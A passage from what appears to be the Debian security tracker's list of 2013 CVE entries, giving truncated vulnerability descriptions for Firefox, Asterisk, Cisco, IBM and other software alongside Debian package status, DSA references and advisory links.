handleStartDataFile funct ...) - libdigidoc (Fixed before initial upload to the archive) CVE-2013-5647 (lib/sounder/sound.rb in the sounder gem 1.0.1 for Ruby allows remote a ...) NOT-FOR-US: Sounder Ruby Gem CVE-2013-5642 (The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1 ...) 
{DSA-2749-1} - asterisk 1:11.5.1~dfsg-1 (bug #721220) NOTE: http://downloads.asterisk.org/pub/security/AST-2013-005.html CVE-2013-5641 (The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1 ...) {DSA-2749-1} - asterisk 1:11.5.1~dfsg-1 (bug #721220) NOTE: http://downloads.asterisk.org/pub/security/AST-2013-004.html CVE-2013-5638 (Transcend WiFiSD 1.8 has persistent XSS ...) NOT-FOR-US: Transcend WiFiSD CVE-2013-5637 (PQI AirCard has persistent XSS ...) NOT-FOR-US: PQI AirCard CVE-2013-5636 (Unlock.exe in Media Encryption EPM Explorer in Check Point Endpoint Se ...) NOT-FOR-US: Check Point Endpoint Security CVE-2013-5635 (Media Encryption EPM Explorer in Check Point Endpoint Security through ...) NOT-FOR-US: Check Point Endpoint Security CVE-2013-5633 REJECTED CVE-2013-5632 REJECTED CVE-2013-5631 REJECTED CVE-2013-5630 REJECTED CVE-2013-5629 REJECTED CVE-2013-5628 REJECTED CVE-2013-5627 REJECTED CVE-2013-5626 REJECTED CVE-2013-5625 REJECTED CVE-2013-5624 REJECTED CVE-2013-5623 REJECTED CVE-2013-5622 REJECTED CVE-2013-5621 REJECTED CVE-2013-5620 REJECTED CVE-2013-5619 (Multiple integer overflows in the binary-search implementation in Spid ...) - iceweasel (Only affects Firefox 25) - iceape (Only affects Firefox 25) CVE-2013-5618 (Use-after-free vulnerability in the nsNodeUtils::LastRelease function ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5617 RESERVED CVE-2013-5616 (Use-after-free vulnerability in the nsEventListenerManager::HandleEven ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5615 (The JavaScript implementation in Mozilla Firefox before 26.0, Firefox ...) 
- iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5614 (Mozilla Firefox before 26.0 and SeaMonkey before 2.23 do not properly ...) - iceweasel (Only affects Firefox 25) CVE-2013-5613 (Use-after-free vulnerability in the PresShell::DispatchSynthMouseMove ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5612 (Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 26. ...) - iceweasel (Only affects Firefox 25) CVE-2013-5611 (Mozilla Firefox before 26.0 does not properly remove the Application I ...) - iceweasel (Only affects Firefox 25) CVE-2013-5610 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 25) - iceape (Only affects Firefox 25) - icedove (Only affects Firefox 25) CVE-2013-5609 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5608 RESERVED CVE-2013-5607 (Integer overflow in the PL_ArenaAllocate function in Mozilla Netscape ...) {DSA-2820-1} - nspr 2:4.10.2-1 CVE-2013-5606 (The CERT_VerifyCert function in lib/certhigh/certvfy.c in Mozilla Netw ...) {DSA-2994-1 DLA-23-1} - nss 2:3.15.3-1 (bug #735105) [squeeze] - nss 3.12.8-1+squeeze8 CVE-2013-5605 (Mozilla Network Security Services (NSS) 3.14 before 3.14.5 and 3.15 be ...) {DSA-2800-1} - nss 2:3.15.3-1 CVE-2013-5604 (The txXPathNodeUtils::getBaseURI function in the XSLT processor in Moz ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel - icedove 17.0.10-1 [squeeze] - icedove [wheezy] - iceape [squeeze] - iceape - iceape CVE-2013-5603 (Use-after-free vulnerability in the nsContentUtils::ContentIsHostInclu ...) 
- iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-5602 (The Worker::SetEventListener function in the Web workers implementatio ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [squeeze] - iceape [wheezy] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5601 (Use-after-free vulnerability in the nsEventListenerManager::SetEventHa ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel - icedove 17.0.10-1 [squeeze] - icedove - iceape [wheezy] - iceape [squeeze] - iceape CVE-2013-5600 (Use-after-free vulnerability in the nsIOService::NewChannelFromURIWith ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [wheezy] - iceape [squeeze] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5599 (Use-after-free vulnerability in the nsIPresShell::GetPresContext funct ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5598 (PDF.js in Mozilla Firefox before 25.0 and Firefox ESR 24.x before 24.1 ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox >=24) [squeeze] - iceweasel - icedove (Only affects Firefox >=24) - iceape (Only affects Firefox >=24) CVE-2013-5597 (Use-after-free vulnerability in the nsDocLoader::doStopDocumentLoad fu ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5596 (The cycle collection (CC) implementation in Mozilla Firefox before 25. ...) 
- iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-5595 (The JavaScript engine in Mozilla Firefox before 25.0, Firefox ESR 17.x ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [squeeze] - iceape [wheezy] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5594 (Mozilla Firefox before 25 allows modification of anonymous content of ...) - firefox-esr (Fixed before initial upload renamed as src:firefox-esr) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=914618 CVE-2013-5593 (The SELECT element implementation in Mozilla Firefox before 25.0, Fire ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-5592 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox >=24) [squeeze] - iceweasel - icedove (Only affects Firefox >=24) - iceape (Only affects Firefox >=24) CVE-2013-5591 (Unspecified vulnerability in the browser engine in Mozilla Firefox bef ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox >=24) [squeeze] - iceweasel - icedove (Only affects Firefox >=24) - iceape (Only affects Firefox >=24) CVE-2013-5590 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [squeeze] - iceape [wheezy] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5634 (arch/arm/kvm/arm.c in the Linux kernel before 3.10 on the ARM platform ...) - linux 3.11.5-1 [wheezy] - linux (KVM for arm introduced in 3.9) - linux-2.6 (KVM for arm introduced in 3.9) CVE-2013-5586 (Cross-site scripting (XSS) vulnerability in wikka.php in WikkaWiki bef ...) 
NOT-FOR-US: WikkaWiki CVE-2013-5585 RESERVED CVE-2013-5584 RESERVED CVE-2013-5583 (Cross-site scripting (XSS) vulnerability in libraries/idna_convert/exa ...) NOT-FOR-US: Joomla! CVE-2013-5582 (Ammyy Admin 3.2 and earlier stores the client ID at a fixed memory loc ...) NOT-FOR-US: Ammyy Admin CVE-2013-5581 REJECTED CVE-2013-5579 RESERVED CVE-2013-5578 (Buffer overflow in the ToDot method in the WINGRAPHVIZLib.NEATO Active ...) NOT-FOR-US: StarUML CVE-2013-5577 RESERVED CVE-2013-5574 RESERVED CVE-2013-5573 (Cross-site scripting (XSS) vulnerability in the default markup formatt ...) - jenkins 1.565.2-1 (bug #732708) NOTE: http://seclists.org/fulldisclosure/2013/Dec/159 CVE-2013-5572 (Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bi ...) - zabbix 1:2.2.2+dfsg-1 (unimportant) NOTE: http://seclists.org/fulldisclosure/2013/Sep/151 NOTE: Non-issue CVE-2013-5571 (HMailServer 5.3.x and prior: Memory Corruption which could cause DOS ...) NOT-FOR-US: HMailServer CVE-2013-5570 (Cross-site scripting (XSS) vulnerability in the Javascript and CSS Opt ...) NOT-FOR-US: TYPO3 extension (js_css_optimizer) CVE-2013-5569 (SQL injection vulnerability in the Slideshare extension 0.1.0 for TYPO ...) NOT-FOR-US: TYPO3 extension CVE-2013-5589 (SQL injection vulnerability in cacti/host.php in Cacti 0.8.8b and earl ...) {DSA-2747-1} - cacti 0.8.8b+dfsg-3 CVE-2013-5588 (Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b an ...) {DSA-2747-1} - cacti 0.8.8b+dfsg-3 CVE-2013-5587 (Cross-site scripting (XSS) vulnerability in Request Tracker (RT) 4.x b ...) {DSA-2671-1} - request-tracker3.8 (only covers the issues in 4.x) - request-tracker4 4.0.12-2 (bug #709836) NOTE: This is covered by the patches applied for CVE-2013-3371 in DSA-2760 and DSA-2761. NOTE: NVD explicitly mentions CVE-2013-5587 only for the RT 4.x series. 
NOTE: patch for 3.8.17: https://github.com/bestpractical/rt/compare/rt-3.8.16...rt-3.8.17 NOTE: patch for 4.0.13: https://github.com/bestpractical/rt/compare/rt-4.0.12...rt-4.0.13 NOTE: still not clear why the split was done, but confirmed by upstream that this issue NOTE: is covered by the fixes applied for CVE-2013-3371 CVE-2013-5580 (The (1) Conn_StartLogin and (2) cb_Read_Resolver_Result functions in c ...) - ngircd (only affects 20, 20.1, and 20.2) NOTE: http://arthur.barton.de/pipermail/ngircd-ml/2013-August/000652.html CVE-2013-5576 (administrator/components/com_media/helpers/media.php in the media mana ...) NOT-FOR-US: Joomla! CVE-2013-5575 REJECTED CVE-2013-5568 (The auto-update implementation in Cisco Adaptive Security Appliance (A ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5567 (Cisco Adaptive Security Appliance (ASA) Software 8.4(.6) and earlier, ...) NOT-FOR-US: Cisco ASA CVE-2013-5566 (Cisco NX-OS 5.0 and earlier on MDS 9000 devices allows remote attacker ...) NOT-FOR-US: Cisco NX-OS CVE-2013-5565 (The OSPFv3 functionality in Cisco IOS XR 5.1 allows remote attackers t ...) NOT-FOR-US: Cisco CVE-2013-5564 (The Java process in the Impact server in Cisco Prime Central for Hoste ...) NOT-FOR-US: Cisco Prime Central for Hosted Collaboration Solution CVE-2013-5563 (Cross-site scripting (XSS) vulnerability in Query/NewQueryResult.jsp i ...) NOT-FOR-US: Cisco CS-MARS CVE-2013-5562 (The ITM web server in Cisco Prime Central for Hosted Collaboration Sol ...) NOT-FOR-US: Cisco CVE-2013-5561 (The Safe Search enforcement feature in Cisco Adaptive Security Applian ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5560 (The IPv6 implementation in Cisco Adaptive Security Appliance (ASA) Sof ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5559 (Buffer overflow in the Active Template Library (ATL) framework in the ...) 
NOT-FOR-US: Cisco AnyConnect Secure Mobility Client CVE-2013-5558 (The WIL-A module in Cisco TelePresence VX Clinical Assistant 1.2 befor ...) NOT-FOR-US: Cisco CVE-2013-5557 (The Proxy Bypass Content Rewriter feature in the WebVPN subsystem in C ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5556 (The license-installation module on the Cisco Nexus 1000V switch 4.2(1) ...) NOT-FOR-US: Cisco CVE-2013-5555 (Cisco Unified Communications Manager (aka CUCM or Unified CM) allows r ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-5554 (Directory traversal vulnerability in the web-management interface in t ...) NOT-FOR-US: Cisco Wide Area Application Services CVE-2013-5553 (Multiple memory leaks in Cisco IOS 15.1 before 15.1(4)M7 allow remote ...) NOT-FOR-US: Cisco IOS CVE-2013-5552 (Cisco IOS 12.4(24)MDB9 and earlier on Content Services Gateway (CSG) d ...) NOT-FOR-US: Cisco CVE-2013-5551 (Cisco Adaptive Security Appliance (ASA) Software, when certain same-se ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5550 (The fabric-interconnect component in Cisco Unified Computing System (U ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-5549 (Cisco IOS XR 3.8.1 through 4.2.0 does not properly process fragmented ...) NOT-FOR-US: Cisco IOS XR CVE-2013-5548 (The IKEv2 implementation in Cisco IOS, when AES-GCM or AES-GMAC is use ...) NOT-FOR-US: Cisco IOS CVE-2013-5547 (Cisco IOS XE 3.9 before 3.9.2S on 1000 ASR devices allows remote attac ...) NOT-FOR-US: Cisco IOS CVE-2013-5546 (The TCP reassembly feature in Cisco IOS XE 3.7 before 3.7.3S and 3.8 b ...) NOT-FOR-US: Cisco IOS CVE-2013-5545 (The PPTP ALG implementation in Cisco IOS XE 3.9 before 3.9.2S on 1000 ...) NOT-FOR-US: Cisco IOS CVE-2013-5544 (The VPN authentication functionality in Cisco Adaptive Security Applia ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5543 (Cisco IOS XE 3.4 before 3.4.2S and 3.5 before 3.5.1S on 1000 ASR devic ...) 
NOT-FOR-US: Cisco IOS CVE-2013-5542 (Cisco Adaptive Security Appliance (ASA) Software 8.4 before 8.4(7.2), ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5541 (Cross-site scripting (XSS) vulnerability in the file-upload interface ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5540 (The file-upload feature in Cisco Identity Services Engine (ISE) allows ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5539 (The upload-dialog implementation in Cisco Identity Services Engine (IS ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5538 (The Sponsor Portal in Cisco Identity Services Engine (ISE) uses weak p ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5537 (The web framework on Cisco Web Security Appliance (WSA), Email Securit ...) NOT-FOR-US: Cisco CVE-2013-5536 (Cisco Secure Access Control System (ACS) does not properly implement a ...) NOT-FOR-US: Cisco CVE-2013-5535 (The analytics page on Cisco Video Surveillance 4000 IP cameras has har ...) NOT-FOR-US: Cisco Video Surveillance 4000 IP cameras CVE-2013-5534 (Directory traversal vulnerability in the attachment service in the Voi ...) NOT-FOR-US: Cisco Unity Connection CVE-2013-5533 (The image-upgrade functionality on Cisco 9900 Unified IP phones allows ...) NOT-FOR-US: Cisco CVE-2013-5532 (Buffer overflow in the web-application interface on Cisco 9900 IP phon ...) NOT-FOR-US: Cisco CVE-2013-5531 (Cisco Identity Services Engine (ISE) 1.x before 1.1.1 allows remote at ...) NOT-FOR-US: Cisco CVE-2013-5530 (The web framework in Cisco Identity Services Engine (ISE) 1.0 and 1.1. ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5529 (The deployment module in the server in Cisco WebEx Meeting Center does ...) NOT-FOR-US: Cisco WebEx Meetings Server CVE-2013-5528 (Directory traversal vulnerability in the Tomcat administrative web int ...) 
NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-5527 (The OSPF functionality in Cisco IOS and IOS XE allows remote attackers ...) NOT-FOR-US: Cisco CVE-2013-5526 (Cisco 9900 fourth-generation IP phones do not properly perform SDP neg ...) NOT-FOR-US: Cisco CVE-2013-5525 (SQL injection vulnerability in the web framework in Cisco Identity Ser ...) NOT-FOR-US: Cisco CVE-2013-5524 (Cross-site scripting (XSS) vulnerability in the troubleshooting page i ...) NOT-FOR-US: Cisco CVE-2013-5523 (The Sponsor Portal in Cisco Identity Services Engine (ISE) 1.2 and ear ...) NOT-FOR-US: Cisco CVE-2013-5522 (Cisco IOS on Catalyst 3750X switches has default Service Module creden ...) NOT-FOR-US: Cisco IOS CVE-2013-5521 (Cisco Identity Services Engine does not properly restrict the creation ...) NOT-FOR-US: Cisco CVE-2013-5520 RESERVED CVE-2013-5519 (Cross-site scripting (XSS) vulnerability in the management interface o ...) NOT-FOR-US: Cisco CVE-2013-5518 RESERVED CVE-2013-5517 (SQL injection vulnerability in the web framework in Cisco Unified Comm ...) NOT-FOR-US: Cisco CVE-2013-5516 (The Media Snapshot implementation on Cisco TelePresence Multipoint Swi ...) NOT-FOR-US: Cisco CVE-2013-5515 (The Clientless SSL VPN feature in Cisco Adaptive Security Appliance (A ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5514 RESERVED CVE-2013-5513 (Cisco Adaptive Security Appliance (ASA) Software 8.2.x before 8.2(5.46 ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5512 (Race condition in the HTTP Deep Packet Inspection (DPI) feature in Cis ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5511 (The Adaptive Security Device Management (ASDM) remote-management featu ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5510 (The remote-access VPN implementation in Cisco Adaptive Security Applia ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5509 (The SSL implementation in Cisco Adaptive Security Appliance (ASA) Soft ...) 
NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5508 (The SQL*Net inspection engine in Cisco Adaptive Security Appliance (AS ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5507 (The IPsec implementation in Cisco Adaptive Security Appliance (ASA) So ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5506 (The authorization functionality in Cisco Firewall Services Module (FWS ...) NOT-FOR-US: Cisco Firewall Services Module CVE-2013-5505 (Cross-site scripting (XSS) vulnerability in an administration page in ...) NOT-FOR-US: Cisco CVE-2013-5504 (Cross-site scripting (XSS) vulnerability in the Mobile Device Manageme ...) NOT-FOR-US: Cisco CVE-2013-5503 (The UDP process in Cisco IOS XR 4.3.1 does not free packet memory upon ...) NOT-FOR-US: Cisco CVE-2013-5502 (The web interface in Cisco MediaSense does not properly protect the cl ...) NOT-FOR-US: Cisco MediaSense CVE-2013-5501 (Cross-site scripting (XSS) vulnerability in the oraservice page in Cis ...) NOT-FOR-US: Cisco MediaSense CVE-2013-5500 (Multiple cross-site scripting (XSS) vulnerabilities in the oraadmin se ...) NOT-FOR-US: Cisco MediaSense CVE-2013-5499 (The remember feature in the DHCP server in Cisco IOS allows remote att ...) NOT-FOR-US: Cisco CVE-2013-5498 (The PPTP-ALG component in CRS Carrier Grade Services Engine (CGSE) and ...) NOT-FOR-US: Cisco IOS XR CVE-2013-5497 (The authentication manager process in the web framework in Cisco Intru ...) NOT-FOR-US: Cisco Intrusion Prevention System CVE-2013-5496 (Open Network Environment Platform (ONEP) in Cisco NX-OS allows remote ...) NOT-FOR-US: Cisco NX-OS CVE-2013-5495 (Cross-site scripting (XSS) vulnerability in the web framework in the A ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-5494 (Cross-site request forgery (CSRF) vulnerability in the web framework i ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-5493 (The diagnostic module in the firmware on Cisco Virtualization Experien ...) 
NOT-FOR-US: Cisco CVE-2013-5492 (administration.jsp in Cisco SocialMiner allows remote attackers to obt ...) NOT-FOR-US: Cisco CVE-2013-5491 RESERVED CVE-2013-5490 (Cisco Prime Data Center Network Manager (DCNM) before 6.2(1) allows re ...) NOT-FOR-US: Cisco Prime Data Center Network Manager CVE-2013-5489 (The gadget implementation in Cisco SocialMiner does not properly restr ...) NOT-FOR-US: Cisco CVE-2013-5488 (Cisco Common Services, as used in Cisco Prime LAN Management Solution ...) NOT-FOR-US: Cisco CVE-2013-5487 (DCNM-SAN Server in Cisco Prime Data Center Network Manager (DCNM) befo ...) NOT-FOR-US: Cisco Prime Data Center Network Manager CVE-2013-5486 (Directory traversal vulnerability in processImageSave.jsp in DCNM-SAN ...) NOT-FOR-US: Cisco Prime Data Center Network Manager CVE-2013-5485 RESERVED CVE-2013-5484 RESERVED CVE-2013-5483 (Cross-site scripting (XSS) vulnerability in bookmarklet.jsp in Cisco S ...) NOT-FOR-US: Cisco CVE-2013-5482 (Cisco Prime LAN Management Solution (LMS) does not properly restrict u ...) NOT-FOR-US: Cisco CVE-2013-5481 (The PPTP implementation in Cisco IOS 12.2 and 15.0 through 15.3, when ...) NOT-FOR-US: Cisco IOS CVE-2013-5480 (The DNS-over-TCP implementation in Cisco IOS 12.2 and 15.0 through 15. ...) NOT-FOR-US: Cisco IOS CVE-2013-5479 (The DNS-over-TCP implementation in Cisco IOS 12.2 and 15.0 through 15. ...) NOT-FOR-US: Cisco IOS CVE-2013-5478 (Cisco IOS 15.0 through 15.3 and IOS XE 3.2 through 3.8, when a VRF int ...) NOT-FOR-US: Cisco IOS CVE-2013-5477 (The T1/E1 driver-queue functionality in Cisco IOS 12.2 and 15.0 throug ...) NOT-FOR-US: Cisco IOS CVE-2013-5476 (The Zone-Based Firewall (ZFW) feature in Cisco IOS 15.1 through 15.2, ...) NOT-FOR-US: Cisco IOS CVE-2013-5475 (Cisco IOS 12.2 through 12.4 and 15.0 through 15.3, and IOS XE 2.1 thro ...) NOT-FOR-US: Cisco IOS CVE-2013-5474 (Race condition in the IPv6 virtual fragmentation reassembly (VFR) impl ...) 
NOT-FOR-US: Cisco IOS CVE-2013-5473 (Memory leak in Cisco IOS 12.2, 15.1, and 15.2; IOS XE 3.4.2S through 3 ...) NOT-FOR-US: Cisco IOS CVE-2013-5472 (The NTP implementation in Cisco IOS 12.0 through 12.4 and 15.0 through ...) NOT-FOR-US: Cisco IOS CVE-2013-5471 (Cross-site request forgery (CSRF) vulnerability in the web framework i ...) NOT-FOR-US: Cisco Global Site Selector CVE-2013-5470 (Cisco Secure Access Control System (ACS) does not properly handle requ ...) NOT-FOR-US: Cisco Secure Access Control System CVE-2013-5469 (The TCP implementation in Cisco IOS does not properly implement the tr ...) NOT-FOR-US: Cisco IOS CVE-2013-5468 (IBM Algo One, as used in MetaData Management Tools in UDS 4.7.0 throug ...) NOT-FOR-US: IBM Algo One CVE-2013-5467 (Monitoring Agent for UNIX Logs 6.2.0 through FP03, 6.2.1 through FP04, ...) NOT-FOR-US: IBM Tivoli Monitoring CVE-2013-5466 (The XSLT library in IBM DB2 and DB2 Connect 9.5 through 10.5, and the ...) NOT-FOR-US: IBM DB2 and DB2 Connect CVE-2013-5465 (IBM Maximo Asset Management 7.x before 7.1.1.7 LAFIX.20140319-0837, 7. ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5464 (IBM Maximo Asset Management 7.5.x before 7.5.0.3 IFIX027, 7.5.0.4 befo ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5463 (The WinCollect agent in IBM Security QRadar SIEM before 7.1.1.569824 a ...) NOT-FOR-US: IBM Security QRadar SIEM CVE-2013-5462 (IBM/ECMClient/configure/explodedformat/navigator/header.jsp in IBM Con ...) NOT-FOR-US: IBM CVE-2013-5461 (IBM Endpoint Manager for Remote Control 9.0.0 and 9.0.1 and Tivoli Rem ...) NOT-FOR-US: IBM CVE-2013-5460 (IBM Maximo Asset Management 7.x before 7.5.0.6 and SmartCloud Control ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5459 (Unspecified vulnerability in IBM Rational Software Architect (RSA) Des ...) NOT-FOR-US: IBM CVE-2013-5458 (Unspecified vulnerability in IBM Java SDK 7.0.0 before SR6 allows remo ...) 
NOT-FOR-US: IBM JDK CVE-2013-5457 (Unspecified vulnerability in IBM Java SDK 7.0.0 before SR6, 6.0.1 befo ...) NOT-FOR-US: IBM JDK CVE-2013-5456 (The com.ibm.rmi.io.SunSerializableFactory class in IBM Java SDK 7.0.0 ...) NOT-FOR-US: IBM JDK CVE-2013-5455 (IBM SmartCloud Provisioning 2.1 before FP3 IF0001 allows remote authen ...) NOT-FOR-US: IBM SmartCloud Provisioning CVE-2013-5454 (IBM WebSphere Portal 6.0 through 6.0.1.7, 6.1.0 through 6.1.0.6 CF27, ...) NOT-FOR-US: IBM WebSphere CVE-2013-5453 (IBM Security AppScan Enterprise 5.6 through 8.7.0.1 allows remote auth ...) NOT-FOR-US: IBM CVE-2013-5452 (IBM FileNet Business Process Framework 4.1.0 allows remote authenticat ...) NOT-FOR-US: IBM FileNet Business Process Framework CVE-2013-5451 RESERVED CVE-2013-5450 (IBM Security AppScan Enterprise 8.5 through 8.7.0.1, when Jazz authent ...) NOT-FOR-US: IBM CVE-2013-5449 (Cross-site scripting (XSS) vulnerability in workingSet.jsp in IBM Ecli ...) NOT-FOR-US: IBM CVE-2013-5448 (Cross-site scripting (XSS) vulnerability in the Right Click Plugin con ...) NOT-FOR-US: IBM Security QRadar SIEM CVE-2013-5447 (Stack-based buffer overflow in IBM Forms Viewer 4.x before 4.0.0.3 and ...) NOT-FOR-US: IBM Forms Viewer CVE-2013-5446 (The console on IBM WebSphere DataPower XC10 appliances 2.1.0 and 2.5.0 ...) NOT-FOR-US: IBM WebSphere DataPower XC10 appliances CVE-2013-5445 (IBM Cognos Express 9.0 before IFIX 2, 9.5 before IFIX 2, 10.1 before I ...) NOT-FOR-US: IBM Cognos CVE-2013-5444 (The server in IBM Cognos Express 9.0 before IFIX 2, 9.5 before IFIX 2, ...) NOT-FOR-US: IBM Cognos CVE-2013-5443 (Cross-site request forgery (CSRF) vulnerability in IBM Cognos Express ...) NOT-FOR-US: IBM Cognos CVE-2013-5442 (Cross-site scripting (XSS) vulnerability in the Local Management Inter ...) NOT-FOR-US: IBM CVE-2013-5441 RESERVED CVE-2013-5440 (IBM InfoSphere Information Server 8.0, 8.1, 8.5, 8.7, and 9.1 allows l ...) 
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2013-5439 RESERVED
CVE-2013-5438 (Cross-site scripting (XSS) vulnerability in the web server in IBM Flex ...)
	NOT-FOR-US: IBM Flex System Manager
CVE-2013-5437 RESERVED
CVE-2013-5436 RESERVED
CVE-2013-5435 RESERVED
CVE-2013-5434 RESERVED
CVE-2013-5433 (The Data Growth Solution for JD Edwards EnterpriseOne in IBM InfoSpher ...)
	NOT-FOR-US: IBM
CVE-2013-5432 RESERVED
CVE-2013-5431 (Open redirect vulnerability in IBM Tivoli Federated Identity Manager ( ...)
	NOT-FOR-US: IBM Tivoli Federated Identity Manager
CVE-2013-5430 (The Jazz Team Server component in IBM Security AppScan Enterprise 8.x ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-5429 (The Risk Based Access functionality in IBM Tivoli Federated Identity M ...)
	NOT-FOR-US: IBM Tivoli Federated Identity Manager
CVE-2013-5428 (IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentic ...)
	NOT-FOR-US: IBM WebSphere DataPower XC10 appliances
CVE-2013-5427 (Cross-site request forgery (CSRF) vulnerability in IBM InfoSphere Mast ...)
	NOT-FOR-US: IBM InfoSphere Master Data Management
CVE-2013-5426 (Session fixation vulnerability in IBM InfoSphere Master Data Managemen ...)
	NOT-FOR-US: IBM
CVE-2013-5425 (Cross-site scripting (XSS) vulnerability in the Administration Console ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-5424 (IBM Flex System Manager (FSM) 1.3.0 allows remote attackers to bypass ...)
	NOT-FOR-US: IBM Flex System Manager
CVE-2013-5423 (IBM Flex System Manager (FSM) 1.1 through 1.3 before 1.3.2.0 allows re ...)
	NOT-FOR-US: IBM Flex System Manager
CVE-2013-5422 (The Web Client in IBM Rational ClearQuest 7.1 through 7.1.2.12, 8.0.0. ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2013-5421 (Cross-site scripting (XSS) vulnerability in the IMS server before Ifix ...)
	NOT-FOR-US: IBM
CVE-2013-5420 (The IMS server before Ifix 6 in IBM Security Access Manager for Enterp ...)
	NOT-FOR-US: IBM Security Access Manager
CVE-2013-5419 (Multiple buffer overflows in (1) mkque and (2) mkquedev in bos.rte.pri ...)
	NOT-FOR-US: IBM AIX
CVE-2013-5418 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-5417 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-5416 (Unspecified vulnerability in IBM Rational ClearCase through 7.1.2.12, ...)
	NOT-FOR-US: IBM Rational ClearCase
CVE-2013-5415 (Buffer overflow in IBM Rational ClearCase through 7.1.2.12, 8.0.0.x be ...)
	NOT-FOR-US: IBM Rational ClearCase
CVE-2013-5414 (The migration functionality in IBM WebSphere Application Server (WAS) ...)
	NOT-FOR-US: IBM WebSphere Application Server
